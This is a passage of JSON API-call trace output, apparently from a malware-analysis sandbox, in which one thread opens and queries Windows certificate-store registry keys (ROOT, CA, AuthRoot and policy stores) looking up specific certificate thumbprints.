            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1813
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1814
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1815
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1816
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0b9e9e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1817
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000057c"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1818
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1819
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1820
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1821
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000056c"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1822
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1823
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1824
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1825
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000570"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1826
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1827
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1828
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1829
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0b9e956",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1830
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1831
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1832
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1833
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1834
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0b9e9e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1835
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000574"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1836
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1837
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1838
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1839
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000578"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1840
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1841
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1842
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1843
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0b9e956",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1844
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1845
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1846
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1847
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1848
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0b9e9e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1849
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000057c"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1850
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1851
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "932BED339AA69212C89375B79304B475490B89A0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0"
              }
            ],
            "repeated": 0,
            "id": 1852
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1853
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000056c"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1854
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C"
              }
            ],
            "repeated": 0,
            "id": 1855
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C"
              }
            ],
            "repeated": 0,
            "id": 1856
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1857
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000570"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1858
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C"
              }
            ],
            "repeated": 0,
            "id": 1859
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C"
              }
            ],
            "repeated": 0,
            "id": 1860
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ee82",
            "parentcaller": "0x7ffee0b9ec18",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "Blob"
              },
              {
                "name": "FullName",
